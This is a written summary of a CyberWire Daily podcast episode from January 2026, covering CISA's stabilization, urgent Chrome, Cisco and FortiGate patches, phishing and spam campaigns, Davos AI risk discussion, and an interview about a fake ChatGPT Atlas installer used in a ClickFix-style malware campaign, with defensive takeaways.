CyberWire Daily — "Stabilized but Smaller"

Date: January 22, 2026

Host: Dave Bittner (N2K Networks)
Guest Interview: Kaushik Deveretti, AI Data Scientist, Fable Security

Episode Overview

This episode covers the stabilization of the US Cybersecurity and Infrastructure Security Agency (CISA) after a turbulent year, major software vulnerabilities and threat campaigns in the wild, new phishing and social engineering trends, notable arrests for cyber-enabled crimes, and heightened concerns about AI and quantum risk at the World Economic Forum in Davos. The featured interview dives into a new flavor of “click-fix” malware attacks using fake AI browser installers.

Key News and Analysis Segments

1. CISA Organizational Update & Congressional Hearings

[01:20 - 03:55]

• CISA’s Acting Director Madhu Gadamukkala told the House Homeland Security Committee the agency has stabilized after 2025’s staff cuts, funding disruptions, and internal restructuring.
  • CISA staff shrank to 2,400, down 1,000 from the start of the Trump administration.
  • Quote: “[CISA] does not expect further organizational changes in fiscal year 2026 ... [and] now has the workforce it needs.” — Gadamukkala [02:30]
  • Republicans praised a more focused operational scope, while Democrats warned further budget cuts threaten civilian cyber defense.
  • Looming DHS funding showdown anticipated.

2. Major Vulnerabilities & Exploits in the Wild

[03:56 - 07:10]

• Google Chrome / Chromium Browsers:

  • Emergency update fixes a critical V8 JavaScript engine “race condition” allowing sandbox escapes and code execution (patch released Jan 20, 2026).
  • Advice: Users urged to update immediately.

• Cisco Enterprise Communications:

  • Emergency patches for unauthenticated code injection in web-based management interfaces. No workarounds available; patching is mandatory.
  • Products affected: Unified Communications Manager, Unity Connection, WebEx Calling Dedicated Instance.

• Fortinet FortiGate Firewalls:

  • Ongoing automated attacks exploit a possible unknown vulnerability in FortiGate’s SSO feature, creating rogue accounts and exporting firewall configs.
  • Quote: “Arctic Wolf says it remains unclear whether current attacks are fully addressed by existing patches ... Fortinet is expected to release additional updates.” [06:04]
  • Exposure: Nearly 11,000 devices online at risk per Shadowserver.
  • Advice: Disable FortiCloud SSO as interim mitigation.

3. Social Engineering Campaigns and Attacker Trends

[07:11 - 09:22]

• Zendesk Relay Spam:

  • Attackers exploit unsecured Zendesk support settings to turn ticketing systems into spam engines, flooding inboxes with hundreds of strange/fake emails.
  • Bypasses spam filters by leveraging trusted brands (Discord, Dropbox, Riot Games affected).
  • Zendesk is rolling out fixes and recommends restricting ticketing to verified users.

• LastPass Phishing Wave:

  • Ongoing campaign sending fake LastPass notifications demanding urgent password vault backups, directing to credential-stealing sites.
  • Advice: LastPass never asks for the master password; users must avoid urgency-fueled prompts.
  • Quote: “A compromised master password could expose many additional accounts.” [09:00]

4. Arrest in Greek Cell Tower Scam

[09:23 - 10:39]

• Greek police arrested two foreign nationals suspected of running an “SMS blaster” that impersonated mobile telecom towers using a mobile computer and concealed antenna.
  • Tactics: Forced phones from 4G to insecure 2G, collected identities, used data for smishing (fraudulent SMS phishing).

5. Davos Developments: AI and Quantum Risk

[10:40 - 12:30]

• AI Security Concerns:
  • EY’s Raj Sharma: Criticizes immaturity of AI agent security frameworks—agents can access critical data with poor identity controls.
  • KPMG’s Tim Walsh: AI-related cyber risk is a top CEO concern and is slowing some AI adoption; flags quantum computing as a looming encryption threat.
    • Quote: “Quantum computing ... could break current encryption and force widespread reengineering.” —Tim Walsh [11:34]

6. Pwn2Own Automotive 2026: Hacking Cars for Cash

[12:31 - 13:57]

• Day 2 saw $439,000+ in prizes for successful car and charger hacks—total for two days over $955,000.
• Targets: EV chargers, car infotainment systems, automotive-grade Linux.
• Teams: Fuzzware IO led with $213,000; Tesla tech featured.
• Vendors now have 90 days to patch bugs found at the event.

Featured Interview: Kaushik Deveretti on Fake ChatGPT Browser Installer

[14:44 - 21:43]

Background

Kaushik Deveretti, AI Data Scientist at Fable Security, describes exploring a new “AI browser” tool (ChatGPT Atlas) and running into a cleverly disguised malware campaign via Google Ads.

Key Discussion Points

• Discovery of the Attack

  • On searching for “ChatGPT Atlas,” Deveretti noticed the top (sponsored) Google ad was a fake but visually identical website, hosted on Google Sites.
  • Quote: “There was really no way to tell that this was a malicious website other than the domain itself not being chatgpts.” — Deveretti [15:54]

• Attack Mechanics: “ClickFix” Twist

  • Clicking “download” led not to a file, but instructions to run a terminal command on the user’s machine; command was encoded in base64 and fetched a remote script (malware).
  • Novelty: Traditional “clickfix” attacks mimic troubleshooting/fixes, but this one presented as a legitimate installer workflow.
  • Quote: “The deception strategy and the entry point was very different from a traditional clickfix attack.” — Deveretti [16:54]

• Execution and Analysis

  • The download process required the user’s system password to proceed—suggesting elevated privileges were needed for malware persistence.
  • Upload to VirusTotal found no matches; EDR solution failed to flag it as malicious.
  • Quote: “The EDR did not pick up that it was a malicious file.” — Deveretti [19:23]

• Defense and Takeaways

  • Awareness: Don’t run commands from untrusted sources, especially via copy-paste in terminal.
  • Technical Controls: Restrict terminal/root access for non-developer users where possible.
  • Layered Approach: Technical safeguards are important, but awareness and education are vital for users with legitimate need for elevated access (e.g., developers).
  • Quote: “I think at a very basic level we should be educating people that they should not be running arbitrary commands on their computer.” — Deveretti [20:27]

Notable Q&A

• Host (Dave Bittner):
  • “As a Mac user…for someone to ask you to invoke the terminal and enter a command—that rarely happens. So that was a red flag for you.” [19:35]
  • Deveretti: “Correct. ...You should never run an arbitrary shell command on your computer...unless you're absolutely sure you know what it's doing.” [19:53]

Additional Security Insights

Common Passwords Remain Unchanged

[24:30 - 25:45]

• Analysis of 6 billion leaked credentials: most common passwords are still “123456,” “password,” and “admin” (both personal and enterprise systems).
  • Numeric strings and trivial passwords remain prevalent, creating easy targets for attackers.
  • “Attackers innovate, users reuse, and security teams clean up the mess.” [25:44]

Memorable Quotes & Moments

• On CISA’s approach:
  • “We now have the workforce we need and plan targeted initiatives in 2026 to address the most critical cyber risk gaps.” — Madhu Gadamukkala [02:34]
• On the click-fix malware evolution:
  • “While clickfix attacks are well known, the deception strategy and the entry point was very different from a traditional clickfix attack.” — Kaushik Deveretti [16:54]
• On end-user best practice:
  • “Never run an arbitrary shell command on your computer unless…you’re absolutely sure you know what it’s doing.” — Kaushik Deveretti [19:53]
• On persistent password problems:
  • “Attackers innovate, users reuse, and security teams clean up the mess.” [25:44]

Timestamps for Key Segments

• CISA Stabilization & Congressional Testimony: 01:20 – 03:55
• Major Vulnerability and Patch Alerts: 03:56 – 07:10
• Social Engineering / Spam & Phishing Campaigns: 07:11 – 09:22
• Greek Cell Tower Scam Arrests: 09:23 – 10:39
• AI and Quantum Risk at Davos: 10:40 – 12:30
• Pwn2Own Automotive Bug Bounties: 12:31 – 13:57
• Featured Interview – Malware in Fake AI Installers: 14:44 – 21:43
• Password Trends Analysis: 24:30 – 25:45

Closing Takeaways

• Enterprise and personal cyber hygiene continue to be challenged by attacker innovation and end-user habits.
• Fake installers and lookalike websites are rapidly evolving and now leverage search ads and AI hype.
• Continuous education—not just technical controls—remains critical for risk mitigation, especially as attackers pivot to new lures and vectors.
• AI’s intersection with cyber risk is now a front-and-center boardroom priority, with quantum computing on the horizon as a potential encryption game-changer.

For links to all referenced stories, visit TheCyberWire.com.